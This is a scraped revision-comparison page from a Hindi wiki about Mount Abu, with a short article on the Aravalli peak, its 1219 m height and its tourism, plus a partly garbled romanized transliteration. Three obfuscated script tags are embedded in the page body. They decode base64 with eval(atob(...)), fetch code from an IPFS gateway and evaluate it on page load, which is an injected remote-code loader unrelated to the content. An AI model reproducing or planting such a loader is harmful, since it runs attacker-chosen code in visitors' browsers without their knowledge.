Difference between revisions of "आबू पर्वत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Mount-Abu-Rajasthan.jpg|thumb|[[माउंट आबू]], [[राजस्थान]]]]
 
[[चित्र:Mount-Abu-Rajasthan.jpg|thumb|[[माउंट आबू]], [[राजस्थान]]]]
*आबू पर्वत [[सिरोही]] ([[राजस्थान]]) में [[अरावली पर्वतमाला|अरावली-श्रृंख़ला]] की एक चोटी है।  
+
*आबू पर्वत [[सिरोही]] के [[राजस्थान]] में [[अरावली पर्वतमाला|अरावली-श्रृंख़ला]] की एक चोटी है।  
 
*आबू पर्वत चोटी समुद्र तल से 1219 मीटर ऊँची है।  
 
*आबू पर्वत चोटी समुद्र तल से 1219 मीटर ऊँची है।  
*आबू पर्वत राजस्थानी राजाओं की ग्रीष्मकालीन राजधानी के रूप में प्रसिद्ध रहा। आज भी सुन्दर पहाड़ी स्वास्थ्य-निवास है।  
+
*आबू पर्वत राजस्थानी राजाओं की ग्रीष्मकालीन राजधानी के रूप में प्रसिद्ध रहा। यहाँ की आज भी सुन्दर पहाड़ी स्वास्थ्य-निवास है।  
 
*मन्दिरों और प्रकृति-सौन्दर्य के कारण आबू पर्वत प्रसिद्ध पर्यटन स्थल भी है।  
 
*मन्दिरों और प्रकृति-सौन्दर्य के कारण आबू पर्वत प्रसिद्ध पर्यटन स्थल भी है।  
 +
 
{{इन्हेंभीदेखें|माउंट आबू}}
 
{{इन्हेंभीदेखें|माउंट आबू}}
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 11:32, 19 October 2011

[[chitr:Mount-Abu-Rajasthan.jpg|thumb|mauant aboo, rajasthan]]

  • aboo parvat sirohi ke rajasthan mean aravali-shrriankhala ki ek choti hai.
  • aboo parvat choti samudr tal se 1219 mitar ooanchi hai.
  • aboo parvat rajasthani rajaoan ki grishmakalin rajadhani ke roop mean prasiddh raha. yahaan ki aj bhi sundar paha di svasthy-nivas hai.
  • mandiroan aur prakriti-saundary ke karan aboo parvat prasiddh paryatan sthal bhi hai.
  1. REDIRECTsaancha:inhean bhi dekhean

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh